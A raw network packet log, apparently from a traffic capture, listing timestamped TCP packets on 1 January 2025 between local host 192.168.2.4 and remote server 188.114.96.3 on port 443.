Jan 1, 2025 17:10:04.418165922 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.419151068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.419210911 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.419219971 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.421506882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.421611071 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.421618938 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.425153017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.425271034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.425335884 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.425344944 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.425390959 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.452092886 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.452151060 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.452254057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.452282906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.452301025 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.452306986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.452358961 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.454665899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.454710960 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.454725027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.454730988 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.454740047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.454763889 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.454776049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.456304073 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.456363916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.456372976 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.456423044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.456717968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.456779003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.457005024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.457058907 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.459640980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.459692001 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.470154047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.470191002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.470225096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.470231056 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.470236063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.470247984 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.470268965 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.470283985 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.470309973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.470340014 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.470345020 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.470386028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.474719048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.474762917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.474770069 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.474776983 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.474813938 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.481102943 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.481159925 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.484436989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.484514952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.484523058 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.484533072 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.484586954 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.484592915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.490722895 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.490787029 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.490793943 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.490909100 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.490964890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.490969896 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.496705055 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.496735096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.496769905 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.496778011 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.496788025 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.497014046 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.497064114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.497071028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.497905016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.497965097 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.497971058 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.497997999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.498271942 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.498280048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.498351097 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.498380899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.498418093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.498425007 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.498449087 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.501566887 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.501621962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.501629114 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.501760006 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.501965046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.501971006 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.502038002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.502090931 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.502096891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.507512093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.507570028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.507577896 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.507678032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.507710934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.507720947 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.507726908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.507755995 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.509630919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.509663105 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.509686947 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.509694099 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.509798050 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.509829998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.509829044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.509846926 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.509852886 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.509879112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.515671015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.515810966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.515846968 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.515851021 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.515856981 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.515862942 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.515902042 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.543699026 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.543728113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.543761015 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.543776035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.543796062 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.543821096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.543828964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.544069052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.545034885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.545099020 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.545099974 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.545109034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.545160055 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.546967030 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.547002077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.547025919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.547032118 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.547041893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.547068119 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.547075033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.547116041 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.547224998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.547282934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.550158978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.550199032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.550211906 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.550219059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.550230980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.550276041 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.550282955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.550323009 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.555203915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.555239916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.555257082 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.555263996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.555341959 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.565349102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.565363884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.565413952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.565422058 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.565462112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.565527916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.574954033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.574971914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.575014114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.575015068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.575025082 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.575047970 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.575063944 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.587129116 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.587183952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.588730097 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.588751078 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.588776112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.588804960 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.588814974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.588839054 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.589118958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.589164019 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.589170933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.589217901 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.592102051 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.592154980 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.592264891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.592324972 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.598089933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.598125935 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.598153114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.598160982 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.598172903 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.598196030 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.598334074 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.598397017 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.600141048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.600198984 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.600306034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.600358009 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.634296894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.634352922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.634377956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.634414911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.634432077 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.634438992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.634453058 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.634483099 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.637579918 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.637597084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.637634039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.637645006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.637653112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.637681961 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.640652895 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.640706062 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.640712976 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.640759945 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.645857096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.645898104 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.645911932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.645925045 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.645936012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.645963907 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.655909061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.655966997 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.655973911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.656058073 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.656085014 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.656133890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.656594992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.656630039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.656657934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.656663895 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.656678915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.665385008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.665441036 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.665448904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.665493965 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.666106939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.666142941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.666167021 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.666172028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.666202068 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.677789927 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.677850962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.677859068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.679562092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.679594994 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.679624081 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.679630041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.679661989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.682884932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.682930946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.682936907 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.682943106 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.682969093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.682991982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.688792944 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.688827991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.688852072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.688862085 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.688884020 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.725061893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.725075960 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.725147009 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.725155115 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.725622892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.725658894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.725684881 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.725688934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.725739956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.726315022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.726352930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.726377010 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.726383924 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.726397038 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.726423025 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.728137016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.728192091 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.736370087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.736412048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.736433983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.736440897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.736464977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.746540070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.746577978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.746614933 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.746625900 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.746650934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.746845007 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.746895075 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.746901989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.747018099 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.747049093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.747071981 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.747078896 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.747087955 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.747503042 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.747550011 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.747556925 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.747598886 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.755925894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.755996943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.756033897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.756094933 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.756551027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.756583929 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.756608963 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.756617069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.756638050 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.756946087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.756999016 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.757006884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.757050991 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.769659996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.769716978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.770051956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.770112038 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.770488977 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.770540953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.770921946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.770982027 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.773299932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.773348093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.781328917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.781346083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.781402111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.781414986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.781440020 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.815507889 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.815572977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.815581083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.815592051 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.815648079 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.815655947 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.815694094 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.816869974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.816927910 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.817065001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.817116976 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.817620039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.817683935 CET	49733	443	192.168.2.4	188.114.96.3
